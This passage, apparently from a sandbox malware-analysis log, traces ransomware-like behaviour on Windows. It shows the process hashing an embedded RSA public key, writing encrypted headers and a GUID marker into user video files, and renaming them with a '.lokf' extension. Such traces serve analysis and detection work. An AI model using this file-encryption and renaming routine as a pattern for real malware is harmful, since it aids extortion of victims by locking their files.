KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.670] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.670] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.671] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.671] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.671] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.671] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.671] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.671] GetLastError () returned 0x0 [0060.671] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.671] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.671] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.671] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.671] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.671] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.672] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.672] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbf86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.672] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.672] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.673] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.673] CloseHandle (hObject=0x5cc) returned 1 [0060.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0060.674] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\xRy69j3Nzz.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\xry69j3nzz.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\xRy69j3Nzz.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\xry69j3nzz.flv.lokf")) returned 1 [0060.675] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf3cd70, ftCreationTime.dwHighDateTime=0x1d4c908, ftLastAccessTime.dwLowDateTime=0x91a0a150, ftLastAccessTime.dwHighDateTime=0x1d4c95a, ftLastWriteTime.dwLowDateTime=0x91a0a150, ftLastWriteTime.dwHighDateTime=0x1d4c95a, nFileSizeHigh=0x0, nFileSizeLow=0x57d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y2xQ-g5gOjeuQ_T_E.mp4", cAlternateFileName="Y2XQ-G~1.MP4")) returned 1 [0060.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201650 [0060.675] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\y2xQ-g5gOjeuQ_T_E.mp4") returned=".mp4" [0060.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\y2xQ-g5gOjeuQ_T_E.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\y2xq-g5gojeuq_t_e.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.675] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=22484) returned 1 [0060.675] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.678] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x57ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.678] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.678] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.679] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x57d4, lpOverlapped=0x0) returned 1 [0060.679] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.679] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.679] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.679] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.679] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.680] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.680] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.680] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.680] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.680] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.680] GetLastError () returned 0x0 [0060.680] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.680] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.680] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.680] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.680] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.680] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.680] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.680] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.680] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x57d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.680] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.681] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.681] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.681] CloseHandle (hObject=0x5cc) returned 1 [0060.682] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.682] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0060.682] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\y2xQ-g5gOjeuQ_T_E.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\y2xq-g5gojeuq_t_e.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\y2xQ-g5gOjeuQ_T_E.mp4.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\y2xq-g5gojeuq_t_e.mp4.lokf")) returned 1 [0060.683] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf3cd70, ftCreationTime.dwHighDateTime=0x1d4c908, ftLastAccessTime.dwLowDateTime=0x91a0a150, ftLastAccessTime.dwHighDateTime=0x1d4c95a, ftLastWriteTime.dwLowDateTime=0x91a0a150, ftLastWriteTime.dwHighDateTime=0x1d4c95a, nFileSizeHigh=0x0, nFileSizeLow=0x57d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y2xQ-g5gOjeuQ_T_E.mp4", cAlternateFileName="Y2XQ-G~1.MP4")) returned 0 [0060.683] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32696d0 | out: hHeap=0x660000) returned 1 [0060.683] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269568 | out: hHeap=0x660000) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32697c0 | out: hHeap=0x660000) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262b28 | out: hHeap=0x660000) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7fb0 | out: hHeap=0x660000) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0060.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c7a8a0 | out: hHeap=0x660000) returned 1 [0060.683] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0060.683] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.684] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.685] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8830 | out: hHeap=0x660000) returned 1 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8830 [0060.686] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: 